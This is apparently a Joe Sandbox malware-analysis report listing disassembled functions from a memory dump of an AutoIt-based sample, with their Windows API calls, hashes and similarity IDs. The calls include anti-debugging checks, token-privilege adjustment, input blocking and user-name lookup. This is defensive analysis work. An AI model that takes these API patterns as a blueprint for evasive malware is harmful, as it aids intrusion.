                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: db99d40e8619246b39fb7174905779d35c05a89ccc0356747ebff5d02b2efef3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3C518C34A04B019FC714DF68C894E96B7E5FF49314F14855EE99A8B3A2DB30ED44CBA1
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • IsDebuggerPresent.KERNEL32 ref: 0010271A
                                                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00102724
                                                                                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 00102731
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3906539128-0
                                                                                                                                                                                                                                          • Opcode ID: f561cb8e28d9976e85dd3a119a4fc22b179a4cb397699f0e99b015bcb009dd82
                                                                                                                                                                                                                                          • Instruction ID: fae021cd44392b87940a724787505151c47c4dc8886b47c5fb34d44cb4ec8738
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f561cb8e28d9976e85dd3a119a4fc22b179a4cb397699f0e99b015bcb009dd82
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9931B47491121C9BCB21DF64DC897D9B7B8BF18310F5041EAE91CA6661EB709F818F45
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • SetErrorMode.KERNEL32(00000001), ref: 001451DA
                                                                                                                                                                                                                                          • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00145238
                                                                                                                                                                                                                                          • SetErrorMode.KERNEL32(00000000), ref: 001452A1
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorMode$DiskFreeSpace
• String ID:
• API String ID: 1682464887-0
• Opcode ID: 509aac01b1666f6a76801abe3588309ff609bb626a17d0f8846b2f2352f767b0
• Instruction ID: 837a61db304bb5fbf8e144410962356d04942a505e2a5c3a226cc61fd2c6ea3d
• Opcode Fuzzy Hash: 509aac01b1666f6a76801abe3588309ff609bb626a17d0f8846b2f2352f767b0
• Instruction Fuzzy Hash: 0A314F75A00618DFDB00DF54D884EEDBBB5FF49314F04809AE8499B362DB71E855CBA0
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 000EFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 000F0668
  • Part of subcall function 000EFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 000F0685
• LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0013170D
• AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0013173A
• GetLastError.KERNEL32 ref: 0013174A
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
• String ID:
• API String ID: 577356006-0
• Opcode ID: 70b9852cf9e6140f31f84e387b34351b024852e18772d88fbb88b07b740f89e1
• Instruction ID: 5dee65e64b7bce20875728873c82714bb5c41017433c36fbdd8b75b8bdb23a8a
• Opcode Fuzzy Hash: 70b9852cf9e6140f31f84e387b34351b024852e18772d88fbb88b07b740f89e1
• Instruction Fuzzy Hash: DD11C1B2404305BFD718AF54DC86DBBBBBDEB04754B24852EF05653641EB70BC418A60
Uniqueness

Uniqueness Score: -1.00%

APIs
• CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0013D608
• DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 0013D645
• CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0013D650
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: CloseControlCreateDeviceFileHandle
• String ID:
• API String ID: 33631002-0
• Opcode ID: d160bb1c15920a8a34f23ae09bb6f3d03752a9aabcf1e323017d0f55ddd6700d
• Instruction ID: 6bb463fced53983457ed1332e988e61c20144ce37a29690e2e93b4f6fab8c563
• Opcode Fuzzy Hash: d160bb1c15920a8a34f23ae09bb6f3d03752a9aabcf1e323017d0f55ddd6700d
• Instruction Fuzzy Hash: 5B115EB5E05228BFDB108F95EC45FAFBBBCEB45B60F108115F914E7290D6B05A058BE1
Uniqueness

Uniqueness Score: -1.00%

APIs
• AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0013168C
• CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 001316A1
• FreeSid.ADVAPI32(?), ref: 001316B1
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: AllocateCheckFreeInitializeMembershipToken
• String ID:
• API String ID: 3429775523-0
• Opcode ID: 63e6eb01b2d7a84167be8a77f4b2d367654dfa57dcf343f0c616dc5f34d8bd60
• Instruction ID: 519033dfb0238adce48cad3c1c0951f81904a16cd3fe612493856c1ff1dd552a
• Opcode Fuzzy Hash: 63e6eb01b2d7a84167be8a77f4b2d367654dfa57dcf343f0c616dc5f34d8bd60
• Instruction Fuzzy Hash: 6FF0F475950309FBDB00DFE49D89AAEBBBCFB08604F504565E501E2181E7B4AA448A90
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID:
• String ID: /
• API String ID: 0-2043925204
• Opcode ID: 3bd60b0923e737fe5cbd555c98d0b72f5df407c81dc18b3555e28157df0629e1
• Instruction ID: c5150098868fce7a8a7f3c41fba57354bca62d3680f8eef0f85ec4244cf5dfea
• Opcode Fuzzy Hash: 3bd60b0923e737fe5cbd555c98d0b72f5df407c81dc18b3555e28157df0629e1
• Instruction Fuzzy Hash: 32410876500219ABCB249FB9DC89EBB7778FB84354F504269F945DB1C0E7B09D818B90
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetUserNameW.ADVAPI32(?,?), ref: 0012D28C
Strings
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: NameUser
• String ID: X64
• API String ID: 2645101109-893830106
• Opcode ID: 0bae9d81cdc9de9ea7d579cd414b530e37439bc49f0648f666cb657bbc2d8b5c
• Instruction ID: 9715881c8f56d50a0d9402a9c83fab7f3d9dc0d5d5b5cc2e9c68cbb0ba52adf1
• Opcode Fuzzy Hash: 0bae9d81cdc9de9ea7d579cd414b530e37439bc49f0648f666cb657bbc2d8b5c
• Instruction Fuzzy Hash: 23D0C9B480112DEECB94CB90EC88DEDB37CBB04305F100152F106A2000D77095488F60
Uniqueness

Uniqueness Score: -1.00%

APIs
• FindFirstFileW.KERNEL32(?,?), ref: 00146918
• FindClose.KERNEL32(00000000), ref: 00146961
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: Find$CloseFileFirst
• String ID:
• API String ID: 2295610775-0
• Opcode ID: 1055b5437cd1f199556e410e223759daf4c4811953e9b0884e08a7b94779ee8f
• Instruction ID: 59b7f7448c9ff598371f0844d20358d3d803f41b6c4da243d8ddcd73970d7959
• Opcode Fuzzy Hash: 1055b5437cd1f199556e410e223759daf4c4811953e9b0884e08a7b94779ee8f
• Instruction Fuzzy Hash: E81190316046019FD710DF29D884A26BBE5FF85328F14C6AEE8698F7A2C770EC45CB91
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00154891,?,?,00000035,?), ref: 001437E4
• FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00154891,?,?,00000035,?), ref: 001437F4
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: ErrorFormatLastMessage
• String ID:
• API String ID: 3479602957-0
• Opcode ID: f57edec689dcfb7e88540d022b21de4d0ae5818b8d872906ce3d781640ff2479
• Instruction ID: 918afc65c631680e2d2219545d84845398ebc9461d6038287f8cd6331d56a452
• Opcode Fuzzy Hash: f57edec689dcfb7e88540d022b21de4d0ae5818b8d872906ce3d781640ff2479
• Instruction Fuzzy Hash: 93F0E5B06053292AE72017668C4EFEB7AAEEFC4771F000175F509D2291DAA09944C6F0
Uniqueness

Uniqueness Score: -1.00%

APIs
• AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,001311FC), ref: 001310D4
• CloseHandle.KERNEL32(?,?,001311FC), ref: 001310E9
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: AdjustCloseHandlePrivilegesToken
• String ID:
• API String ID: 81990902-0
• Opcode ID: 8f47e03b4d4e7656f6f7afc5c37303331e78a0a272b4c6c67abbca456a2071ca
• Instruction ID: 214358aa276fcc2fb0c2418d6b56e154e7c894ddbd6aafc4827efbd31a66d4a2
• Opcode Fuzzy Hash: 8f47e03b4d4e7656f6f7afc5c37303331e78a0a272b4c6c67abbca456a2071ca
• Instruction Fuzzy Hash: 98E0BF72018651AEE7252B52FC05EB77BA9EB04310F14882DF5A5905B1DBA26CD0DB50
Uniqueness

Uniqueness Score: -1.00%

APIs
• BlockInput.USER32(00000001), ref: 0014EABD
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: BlockInput
• String ID:
• API String ID: 3456056419-0
• Opcode ID: 0edf2a3943a36b195cf175b80e5021c30a20bdb6cb5382655f6c700cf464aa64
• Instruction ID: f0bd62ceee3c0f0d91817550023cc98a373e95d77358a711c4f43ce1b3957835
• Opcode Fuzzy Hash: 0edf2a3943a36b195cf175b80e5021c30a20bdb6cb5382655f6c700cf464aa64
• Instruction Fuzzy Hash: FDE01A312002059FD710EF59D804E9AB7E9BF98760F118426FD49C7361DBB0A8408BA0
Uniqueness

Uniqueness Score: -1.00%

APIs
• SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,000F03EE), ref: 000F09DA
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
• Opcode ID: fcfaf1156bd3b7f7684fe3004cfc6e65a0717dc27f3a51ebb87b7daa6c7b17ac
• Instruction ID: 4d6d687fcda55087aa2028da7b09b054dfe02dc3b72f434b97cf5769a46cd136
• Opcode Fuzzy Hash: fcfaf1156bd3b7f7684fe3004cfc6e65a0717dc27f3a51ebb87b7daa6c7b17ac
• Instruction Fuzzy Hash:
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 00152B30
                                                                                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 00152B43
                                                                                                                                                                                                                                          • DestroyWindow.USER32 ref: 00152B52
                                                                                                                                                                                                                                          • GetDesktopWindow.USER32 ref: 00152B6D
                                                                                                                                                                                                                                          • GetWindowRect.USER32(00000000), ref: 00152B74
                                                                                                                                                                                                                                          • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00152CA3
                                                                                                                                                                                                                                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00152CB1
                                                                                                                                                                                                                                          • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00152CF8
                                                                                                                                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 00152D04
                                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00152D40
                                                                                                                                                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00152D62
                                                                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00152D75
                                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00152D80
                                                                                                                                                                                                                                          • GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00152D89
                                                                                                                                                                                                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00152D98
                                                                                                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00152DA1
                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00152DA8
                                                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00152DB3
                                                                                                                                                                                                                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00152DC5
                                                                                                                                                                                                                                          • OleLoadPicture.OLEAUT32(?,00000000,00000000,0016FC38,00000000), ref: 00152DDB
                                                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00152DEB
                                                                                                                                                                                                                                          • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00152E11
                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00152E30
                                                                                                                                                                                                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00152E52
                                                                                                                                                                                                                                          • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0015303F
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                                                                                                                                          • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                                                                                                                                          • API String ID: 2211948467-2373415609
                                                                                                                                                                                                                                          • Opcode ID: 497dde3c4062295f8ff5f72ae38b3ee965140fe77422bc9d00690ca76cccf2ff
                                                                                                                                                                                                                                          • Instruction ID: f3749578a1bac2b30f68180bcad6ed224720995f5503f75f1e8a48e8b9dd3b75
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 497dde3c4062295f8ff5f72ae38b3ee965140fe77422bc9d00690ca76cccf2ff
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 91027C72900205EFDB14DF64DC89EAE7BB9FF49311F008119F915AB2A1DBB4AD45CBA0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • SetTextColor.GDI32(?,00000000), ref: 0016712F
                                                                                                                                                                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 00167160
                                                                                                                                                                                                                                          • GetSysColor.USER32(0000000F), ref: 0016716C
                                                                                                                                                                                                                                          • SetBkColor.GDI32(?,000000FF), ref: 00167186
                                                                                                                                                                                                                                          • SelectObject.GDI32(?,?), ref: 00167195
                                                                                                                                                                                                                                          • InflateRect.USER32(?,000000FF,000000FF), ref: 001671C0
                                                                                                                                                                                                                                          • GetSysColor.USER32(00000010), ref: 001671C8
                                                                                                                                                                                                                                          • CreateSolidBrush.GDI32(00000000), ref: 001671CF
                                                                                                                                                                                                                                          • FrameRect.USER32(?,?,00000000), ref: 001671DE
                                                                                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 001671E5
                                                                                                                                                                                                                                          • InflateRect.USER32(?,000000FE,000000FE), ref: 00167230
                                                                                                                                                                                                                                          • FillRect.USER32(?,?,?), ref: 00167262
                                                                                                                                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00167284
                                                                                                                                                                                                                                            • Part of subcall function 001673E8: GetSysColor.USER32(00000012), ref: 00167421
                                                                                                                                                                                                                                            • Part of subcall function 001673E8: SetTextColor.GDI32(?,?), ref: 00167425
                                                                                                                                                                                                                                            • Part of subcall function 001673E8: GetSysColorBrush.USER32(0000000F), ref: 0016743B
                                                                                                                                                                                                                                            • Part of subcall function 001673E8: GetSysColor.USER32(0000000F), ref: 00167446
                                                                                                                                                                                                                                            • Part of subcall function 001673E8: GetSysColor.USER32(00000011), ref: 00167463
                                                                                                                                                                                                                                            • Part of subcall function 001673E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00167471
                                                                                                                                                                                                                                            • Part of subcall function 001673E8: SelectObject.GDI32(?,00000000), ref: 00167482
                                                                                                                                                                                                                                            • Part of subcall function 001673E8: SetBkColor.GDI32(?,00000000), ref: 0016748B
                                                                                                                                                                                                                                            • Part of subcall function 001673E8: SelectObject.GDI32(?,?), ref: 00167498
                                                                                                                                                                                                                                            • Part of subcall function 001673E8: InflateRect.USER32(?,000000FF,000000FF), ref: 001674B7
                                                                                                                                                                                                                                            • Part of subcall function 001673E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 001674CE
                                                                                                                                                                                                                                            • Part of subcall function 001673E8: GetWindowLongW.USER32(00000000,000000F0), ref: 001674DB
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 4124339563-0
                                                                                                                                                                                                                                          • Opcode ID: 7376255201e5be78f03724fc9cc4c5369f7d2ad13b0fe21634e0eaa004afcca6
                                                                                                                                                                                                                                          • Instruction ID: dcfff1e0bfa95f4bc752cd050b508ed17fea4e26903556c67ae47be29f6f5941
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7376255201e5be78f03724fc9cc4c5369f7d2ad13b0fe21634e0eaa004afcca6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 11A1D472108301FFDB009F60DC48E6B7BA9FF89325F104A19F9A2965E1D7B4E994CB91
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

APIs
• DestroyWindow.USER32(?,?), ref: 000E8E14
• SendMessageW.USER32(?,00001308,?,00000000), ref: 00126AC5
• ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00126AFE
• MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00126F43
  • Part of subcall function 000E8F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,000E8BE8,?,00000000,?,?,?,?,000E8BBA,00000000,?), ref: 000E8FC5
• SendMessageW.USER32(?,00001053), ref: 00126F7F
• SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00126F96
